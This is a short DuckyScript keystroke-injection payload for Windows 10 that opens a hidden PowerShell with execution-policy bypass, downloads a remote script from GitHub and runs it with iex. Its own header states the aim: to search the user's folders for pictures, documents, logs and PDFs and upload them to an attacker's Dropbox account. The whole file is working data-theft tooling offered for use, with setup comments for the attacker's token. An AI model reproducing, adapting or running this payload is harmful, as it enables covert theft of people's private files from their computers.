
REM Title: beigeworm's Exfiltrate files to Dropbox
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10

REM *SETUP*
REM replace DDROPBOX_TOKEN with your Dropbox Token.
REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShot-to-Dropbox.ps1 | iex
ENTER

